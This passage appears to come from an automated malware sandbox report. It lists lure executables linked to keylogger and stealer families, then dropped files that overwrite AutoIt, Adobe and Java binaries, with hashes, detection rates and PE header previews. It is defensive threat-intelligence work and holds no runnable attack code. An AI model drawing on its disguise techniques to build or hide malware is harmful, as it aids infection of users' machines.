                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                54328bd36c14bd82ddaa0c04b25ed9adMICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                ZM-Z_2024-000343__SKM-0_000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                INQUIRY_pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                FATURA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                RECEIPT DATED 28.11.2024,pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 104.21.67.152

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1353216
                                                                                                                                                Entropy (8bit):5.324392127149725
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:TC4VQjGARQNhiFXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:TOCAR0iFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:C87616AD4EE0DCF4B5C5C5455523DC02
                                                                                                                                                SHA1:0F070A61A197DC4740B375B62985AD63CF85855E
                                                                                                                                                SHA-256:CD73E935AC7397551890CE8F35D8DD1DC1C0372E6F44132D2C91FE7BFF92669C
                                                                                                                                                SHA-512:96B917C1A67C30D96C9E9000D5FC8E814C6CA13592A66A1D4562E6C3973440E4D166CCC1A1DD8F1AB3E3E038D04EC390F1D4B293AF31FEAD78826E5A2C40CCA3
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1294848
                                                                                                                                                Entropy (8bit):5.2827029540953
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:oNUpaKghCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oCMKgQsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:6C9C41C433FDEDFF6B3B15C2F8591F0A
                                                                                                                                                SHA1:2A736A37AA1FD3FF387608EDC3AC073AEC05B746
                                                                                                                                                SHA-256:29C1C32E31D12D293D500984920F71E4E7C0DBFCF8802F79180F08964B64EC4E
                                                                                                                                                SHA-512:C79BD1196E77C4006DFCEE5FF470CBD42D00D34FAB364EE636CC3CA8EF20C0F96DE4B10718CED3F770F8D3CEBA983E614852844E9B7B39B0E42490931916B666
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .....Q.......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1314304
                                                                                                                                                Entropy (8bit):5.274142278022451
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:xMEhwdbT5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PKdH5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:72EA5E11FC4A1E6E7E362080A0F553D5
                                                                                                                                                SHA1:EA9965AE112DD884C16242CF624CCA998E0F1AF5
                                                                                                                                                SHA-256:7390C6729A4DBB06473EDE82C8E965494479738E877172B4351F907BE7C1D3AD
                                                                                                                                                SHA-512:DB0708B4CF5A22B5BFB3E66566D16A13D9AAC111524F219F9C3AB8F6D8D86D6AC1E63DA3B684F5B4871B600C8A07ECE6F741DCA68DFC3F0D1172BE5A73DB569F
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2203136
                                                                                                                                                Entropy (8bit):7.64703726104498
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:5K0eqkSR7Xgo4TiRPnLWvJlDmg27RnWGj:5K0pR7Xn4TiRCvJlD527BWG
                                                                                                                                                MD5:A063278F25C70AF7368384BBA8CCC0F6
                                                                                                                                                SHA1:874FA72AF12E4AE6E6591F161B59D8C6F18C0CAE
                                                                                                                                                SHA-256:B516DA72A138BDACFA25A998F6929218BA3BDD60AE292E7920A7DFC62EA98E35
                                                                                                                                                SHA-512:CD9A66AD4AF4D99E8CE6A421E761DA38DA7B9A852E50D9A5C0040590E6CA73755F705F092F3697B4C6EF4CC388A3D78F375215ADB9EF3501F0CCB3D250263B77
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".....7a"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2369024
                                                                                                                                                Entropy (8bit):7.565063173898028
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:ifYP1JsEDkSR7Xgo4TiRPnLWvJlDmg27RnWGj:yYPBR7Xn4TiRCvJlD527BWG
                                                                                                                                                MD5:0216EE9C539B2DE59B45142A9A6A3726
                                                                                                                                                SHA1:FE9A2BDB273BE6BF6AE320F5F24CCDEE4E6E7501
                                                                                                                                                SHA-256:FC08F9B782F0C0C4E66C61F350B5E016FE88DD4E0709F3BDB663E094695F569B
                                                                                                                                                SHA-512:6835D1D49202911833D077DEDEFBDA68C208267945BA258A0C822A3FC47A34D861A65860ECEC98E94598240B4FD8BF6512441A836F1690303B28FED32BF6C988
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......%... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1245184
                                                                                                                                                Entropy (8bit):5.12356816645073
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:k62SYUcknnTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:xYUcknTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:7825CB0B983B1915C7060185F6EB1B2B
                                                                                                                                                SHA1:A9ACA76309E082CC043EB421FF0AAA3BCB37C73D
                                                                                                                                                SHA-256:33D125EFE995F2D866097F1B308CE5E52DE4BD45B9AC79C1E98B7798140181C5
                                                                                                                                                SHA-512:5A55FAE894415A08F0CD65950C35F770DF1AC5E167F11794F99D920C4D4D43E74EC14EC1A0C787CA7267F4F066461A3BB8AE8B289405FD8079A5362D61DB9B34
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@...............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1640448
                                                                                                                                                Entropy (8bit):7.1666698360156555
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:z+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSBDmg27RnWGj:RSktbpXD527BWG
                                                                                                                                                MD5:8F557566CA84E322018A2B23B5A8A84B
                                                                                                                                                SHA1:8C723FAC77FCB19DF60053912B8075076683FEF5
                                                                                                                                                SHA-256:A1CFD240B671B463427CBB3480BCC9F00D1E959FFC80A2132B2C61083BFD2ECC
                                                                                                                                                SHA-512:48F2E315B90BF3889AD1C468574D07C65870C8752DEA8A58BDDF1F9EBFC76EAC528BDCBC8108F41459AC946485701FA748EA97E125F73A96F114BC6319879AA2
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................JN.... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2953728
                                                                                                                                                Entropy (8bit):7.09463346611018
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:2GSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLODmg27RnWGj:y4OEtwiICvYMRfuD527BWG
                                                                                                                                                MD5:577FD8FA4E44AD642FCEB518746127EC
                                                                                                                                                SHA1:8CFC79898B6CE9069F3F32DBDCFAC249FC1E1D98
                                                                                                                                                SHA-256:2988A2095B75C9296B0B55D04498E7338608D59F37DCCCCFD935692AC9945786
                                                                                                                                                SHA-512:FACB79FC9C2B3CA3B732664DEA6E252B545A2289A59D0782B9E1365FF2DF91FD522D241A995B1197F8AE85401972BDA4D89514F4546811012AD0FA116654E3FA
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1485824
                                                                                                                                                Entropy (8bit):5.49640336777187
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:pAMuR+3kMbVjhVsqjnhMgeiCl7G0nehbGZpbD:+D+lbVjhJDmg27RnWGj
                                                                                                                                                MD5:A5B1D024A96B1CD8C2A6DA504B3C7D81
                                                                                                                                                SHA1:74DA7220B97871ED9AB9464B549BFD2F1963E12F
                                                                                                                                                SHA-256:60146A7633DB8C98353B30DC1FCB7FD93FAD47CB5FD1DC511AC84465D93D2EB4
                                                                                                                                                SHA-512:3C0DAC9326536D2773934D3735CE7A2D8B78FFBDA56F632D4E93AAF2FF5CA84E56AF8FE1FD72BB2981EAC9F93913ADF76C145418D2FCFDBD60AE1EDBC8F4169C
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..................................v.......................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1290240
                                                                                                                                                Entropy (8bit):5.277762657821456
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:QImGUcsvZZdubv7hfl3fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:QxGBcmlvsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:C8BF45BDD9AC7A2C04E7836B9AC9D15E
                                                                                                                                                SHA1:513F87DFBFB9699D044E9101846F4DD278FC9E47
                                                                                                                                                SHA-256:C2F06250B7606D599377A25CBBB4A689A10BB51A755397FB5EF58077FEAD8ED3
                                                                                                                                                SHA-512:0A3F6E39B8031B961783B059C88BE677EBFB7A6C7A4BE125047A81A855506E6FC7F255ABD898A74E5EE395A00D1E1E07BF162B342852BE3928A1DA3A5E88CF4C
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@................................./.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1644544
                                                                                                                                                Entropy (8bit):5.6948062798472945
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:t0vHyeLj8trn3wsDsqjnhMgeiCl7G0nehbGZpbD:wtj4rgsHDmg27RnWGj
                                                                                                                                                MD5:CAC57CEE72A26F39FBF9019DFD994258
                                                                                                                                                SHA1:1FA8CFF5B16B4AFD4D53CE77E47BD215E69CCDDE
                                                                                                                                                SHA-256:8EB7C8FC4F36F6494BE37DAC180D7AB0AE5DC492AE6A6BB1EC1ED5048E0FBCBD
                                                                                                                                                SHA-512:85F5054D3C894DA1E2F76CFDAC743706F0A8C9B4C33AB7561B00C5BFD05530DF3C6534A5A4DF05D5B68315097B4BCB81CC4C68D8E0E698482C1F33DC9F3FFBA1
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`..............................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1781760
                                                                                                                                                Entropy (8bit):7.279671701052209
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:1oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZqsqjnhMgeiCl7G0nehbGZpv:s4i0wGJra0uAUfkVy7/Z+Dmg27RnWGj
                                                                                                                                                MD5:E0BA361D8DB272A47BCF8AC05D8D8DDE
                                                                                                                                                SHA1:2308743BCA80A903EE6B7AFC9194010116B8F6EF
                                                                                                                                                SHA-256:4E427BAC41FD02E06DA61150B76F1EB6B67E29F47DB85D67A153614C952CCBF2
                                                                                                                                                SHA-512:5EE99BF2B32F41B442ACA0D0B72080966D4921C9FCF292D1292CAB4CA2CBCBEE394BE134B13D767FE546037C10D3963272BE9D38B6C02EE3F924CEE32799A3D8
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................u...........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1318400
                                                                                                                                                Entropy (8bit):7.448767740774152
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:jeR0gB6axoCf0R6RLQRF/TzJqe58BimNsqjnhMgeiCl7G0nehbGZpbD:9gHxmR6uBTzge5MimxDmg27RnWGj
                                                                                                                                                MD5:3C0C14BBD711571F3BC7DB429209660A
                                                                                                                                                SHA1:74C3AF40A85FD0BBA1182837D992CFFED574E3E3
                                                                                                                                                SHA-256:7E6FCA674E89EEC99E95772FD7C97E1A20D8034CE9F09DE79D3D24000BB7B066
                                                                                                                                                SHA-512:2CDA7A9777170226C4CAEB4556626FF17E8066965354B8356CC61EFDE898FAD9190E55917492B7D0D9083767E04685425E935D644EEBF1810F9E100134BD9AB9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`.......f......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1375232
                                                                                                                                                Entropy (8bit):5.44607838928542
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:JnEbH0j4x7R6SvyCMzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:JkwOtO7zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:4AD025F22D34898623700DE8727B3941
                                                                                                                                                SHA1:FBB5542C714F0E084D1C3A879ED467C535B07665
                                                                                                                                                SHA-256:8EBFBBB2AB75EFF25AA2FFAD1BC5AFC2BC50273D5EAF8FF9A6040155CE8A3CB3
                                                                                                                                                SHA-512:B0F6876F7AE2497FC451F78FD8699B04B4E2A2632F49F7794160200DB77CCB53A35288FF31EB0B94B59554E44AF752BDC78CD3EEC569B9DA445BA8E93A397C60
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......?........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1375232
                                                                                                                                                Entropy (8bit):5.446828223740191
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:bnU/h/4KIsqjnhMgeiCl7G0nehbGZpbD:bU/V0Dmg27RnWGj
                                                                                                                                                MD5:72A978F591C29F451B4AD70E56980EA4
                                                                                                                                                SHA1:143E8677C243067B0C348A3EA749A301DEC92F4E
                                                                                                                                                SHA-256:DE03CAA9C66A6840FF0CE00810F91A859BDBF1CBC4F5E811608A720470FE9FC3
                                                                                                                                                SHA-512:7B94291B4E9F4EDCA6658A7A974BC25DD6D4599980E11B288C641AFC388207A3740534F5D2A83D6181F48143955FFBB5419DB04D00619E7A92AF243037CD6C4B
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@....../&.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1513984
                                                                                                                                                Entropy (8bit):5.483747168116759
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:0x71iBLZ05jNTmJWExXsqjnhMgeiCl7G0nehbGZpbD:0xhiHIjNgrDmg27RnWGj
                                                                                                                                                MD5:664327AED4B7D1E6C7D60C00F84E177D
                                                                                                                                                SHA1:F96C7F25954B084B49D48ACF3BA9157241A86760
                                                                                                                                                SHA-256:EA1D2B18B222E6518DA0D7422DA45950F4C691BDE39828119809E913631D27CA
